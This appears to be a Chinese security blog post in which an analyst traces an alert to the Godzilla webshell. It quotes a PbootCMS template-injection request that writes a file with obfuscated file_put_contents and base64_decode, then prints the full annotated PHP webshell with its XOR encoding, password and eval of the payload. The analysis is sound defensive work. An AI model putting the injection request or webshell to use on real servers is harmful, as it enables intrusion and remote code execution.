初遇哥斯拉Godzilla

今天在分析告警的时候，无意中碰到一个有意思的载荷，于是想追踪一下，结果发现是哥斯拉Godzilla，这是我第一次遇到哥斯拉，相信还会有第二次，第三次，看上去和冰蝎、蚁剑、菜刀一样，是一个有趣的webshell管理工具。

ailx10

网络安全优秀回答者

网络安全硕士

去咨询

GET /{pboot:if(("file_put_co"."ntents")("jump.php",("base6"."4_decode"),(...)))}{/pboot:if}/../../?p=cp/ HTTP/1.1

将"file_put_co"."ntents" 连接起来是 file_put_contents

将"base6"."4_decode" 连接起来是 base64_decode

GET /{pboot:if(("file_put_contents")("jump.php",("base64_decode"),(...)))}{/pboot:if}/../../?p=cp/ HTTP/1.1

file_put_contents 是 PHP 中用于向文件中写入内容的函数。

{pboot:if} 和 {/pboot:if} 看上去是一对标记。

然后就是重头戏：... ，将其进行base64解码，得到一段PHP代码。

这段代码的核心在于对数据进行加密和解密，并通过特定条件执行有效载荷中的代码。

它使用了简单的异或运算作为加密手段，并且通过 eval() 函数执行了解密后的有效载荷。[1][2]

<?php@session_start(); // 尝试启动会话，@ 符号用于抑制错误输出@set_time_limit(0); // 设置脚本执行时间上限为无限制，@ 符号用于抑制错误输出@error_reporting(0); // 关闭错误报告，@ 符号用于抑制错误输出function encode($D, $K){ for($i=0; $i<strlen($D); $i++) { $c = $K[$i+1&15]; // 根据密钥 $K 处理加密 $D[$i] = $D[$i] ^ $c; // 通过异或运算对数据 $D 进行加密 } return $D; // 返回加密后的数据}$pass = 'day8'; // 设定密码$payloadName = 'payload'; // 设定有效载荷名称$key='83b70504e0d8742d'; // 设定密钥if (isset($_POST[$pass])){ // 如果收到了名为 $pass 的 POST 请求 $data = encode(base64_decode($_POST[$pass]), $key); // 对 POST 数据进行解码和加密处理 if (isset($_SESSION[$payloadName])){ // 如果会话中存在有效载荷 $payload = encode($_SESSION[$payloadName], $key); // 使用密钥对有效载荷进行解密 if (strpos($payload, "getBasicsInfo") === false){ // 如果有效载荷不包含指定字符串 $payload = encode($payload, $key); // 对有效载荷再次进行加密 } eval($payload); // 执行有效载荷中的代码 echo substr(md5($pass.$key), 0, 16); // 输出密码和密钥的部分 MD5 散列值 echo base64_encode(encode(@run($data), $key)); // 输出对特定函数运行结果的加密数据 echo substr(md5($pass.$key), 16); // 输出密码和密钥的部分 MD5 散列值的另一部分 } else { if (strpos($data, "getBasicsInfo") !== false){ // 如果接收到的数据包含指定字符串 $_SESSION[$payloadName] = encode($data, $key); // 将数据加密后存储到会话中作为有效载荷 } }}

在网上寻找了一下，竟然找到了，是哥斯拉webshell代码，网上有对代码的详细解读。